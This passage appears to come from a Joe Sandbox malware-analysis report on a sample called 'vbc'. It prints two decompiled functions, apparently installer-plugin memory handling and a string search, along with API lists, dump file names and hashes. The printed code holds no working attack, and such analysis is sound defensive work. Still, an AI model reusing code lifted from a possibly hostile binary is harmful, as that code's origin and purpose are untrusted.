                                                • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
                                                • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void* _v0;
                                                				void* _t17;
                                                				signed int _t19;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t30;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t39;
                                                				signed int _t41;
                                                				void* _t42;
                                                				void* _t51;
                                                				void* _t52;
                                                				signed short* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t61;
                                                
                                                				 *0x1000406c = _a8;
                                                				 *0x10004070 = _a16;
                                                				 *0x10004074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                				_t17 = E10001243();
                                                				_v0 = _t17;
                                                				_t52 = _t17;
                                                				if( *_t17 == 0) {
                                                					L16:
                                                					return GlobalFree(_t17);
                                                				} else {
                                                					do {
                                                						_t19 =  *_t52 & 0x0000ffff;
                                                						_t42 = 2;
                                                						_t54 = _t52 + _t42;
                                                						_t61 = _t19 - 0x6c;
                                                						if(_t61 > 0) {
                                                							_t20 = _t19 - 0x70;
                                                							if(_t20 == 0) {
                                                								L12:
                                                								_t52 = _t54 + _t42;
                                                								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                								L13:
                                                								GlobalFree(_t24);
                                                								goto L14;
                                                							}
                                                							_t26 = _t20 - _t42;
                                                							if(_t26 == 0) {
                                                								L10:
                                                								_t52 =  &(_t54[1]);
                                                								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                								goto L13;
                                                							}
                                                							L7:
                                                							if(_t26 == 1) {
                                                								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                								 *_t30 =  *0x10004040;
                                                								 *0x10004040 = _t30;
                                                								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                								_t59 = _t59 + 0xc;
                                                							}
                                                							goto L14;
                                                						}
                                                						if(_t61 == 0) {
                                                							L17:
                                                							_t33 =  *0x10004040;
                                                							if( *0x10004040 != 0) {
                                                								E10001563( *0x10004074, _t33 + 4, _t41);
                                                								_t59 = _t59 + 0xc;
                                                								_t36 =  *0x10004040;
                                                								GlobalFree(_t36);
                                                								 *0x10004040 =  *_t36;
                                                							}
                                                							goto L14;
                                                						}
                                                						_t38 = _t19 - 0x4c;
                                                						if(_t38 == 0) {
                                                							goto L17;
                                                						}
                                                						_t39 = _t38 - 4;
                                                						if(_t39 == 0) {
                                                							 *_t54 =  *_t54 + 0xa;
                                                							goto L12;
                                                						}
                                                						_t26 = _t39 - _t42;
                                                						if(_t26 == 0) {
                                                							 *_t54 =  *_t54 + 0xa;
                                                							goto L10;
                                                						}
                                                						goto L7;
                                                						L14:
                                                					} while ( *_t52 != 0);
                                                					_t17 = _v0;
                                                					goto L16;
                                                				}
                                                			}





















                                                0x100010e6
                                                0x100010f0
                                                0x100010ff
                                                0x1000110e
                                                0x10001119
                                                0x1000111c
                                                0x1000112b
                                                0x1000112f
                                                0x10001131
                                                0x100011d8
                                                0x100011de
                                                0x10001137
                                                0x10001138
                                                0x10001138
                                                0x1000113d
                                                0x1000113e
                                                0x10001140
                                                0x10001143
                                                0x1000120d
                                                0x10001210
                                                0x100011b0
                                                0x100011b6
                                                0x100011bf
                                                0x100011c4
                                                0x100011c7
                                                0x00000000
                                                0x100011c7
                                                0x10001212
                                                0x10001214
                                                0x10001196
                                                0x1000119d
                                                0x100011a5
                                                0x00000000
                                                0x100011a5
                                                0x10001161
                                                0x10001162
                                                0x1000116a
                                                0x10001177
                                                0x1000117f
                                                0x10001188
                                                0x1000118d
                                                0x1000118d
                                                0x00000000
                                                0x10001162
                                                0x10001149
                                                0x100011df
                                                0x100011df
                                                0x100011e6
                                                0x100011f3
                                                0x100011f8
                                                0x100011fb
                                                0x10001203
                                                0x10001205
                                                0x10001205
                                                0x00000000
                                                0x100011e6
                                                0x1000114f
                                                0x10001152
                                                0x00000000
                                                0x00000000
                                                0x10001158
                                                0x1000115b
                                                0x100011ac
                                                0x00000000
                                                0x100011ac
                                                0x1000115d
                                                0x1000115f
                                                0x10001192
                                                0x00000000
                                                0x10001192
                                                0x00000000
                                                0x100011c9
                                                0x100011c9
                                                0x100011d3
                                                0x00000000
                                                0x100011d7

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405D4C(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405d5c
                                                0x00405d5e
                                                0x00405d61
                                                0x00405d8d
                                                0x00405d66
                                                0x00405d6f
                                                0x00405d74
                                                0x00405d7f
                                                0x00405d82
                                                0x00405d9e
                                                0x00405d84
                                                0x00405d8b
                                                0x00000000
                                                0x00405d8b
                                                0x00405d97
                                                0x00405d9b
                                                0x00405d9b
                                                0x00405d95
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D74
                                                • CharNextA.USER32(00000000), ref: 00405D85
                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%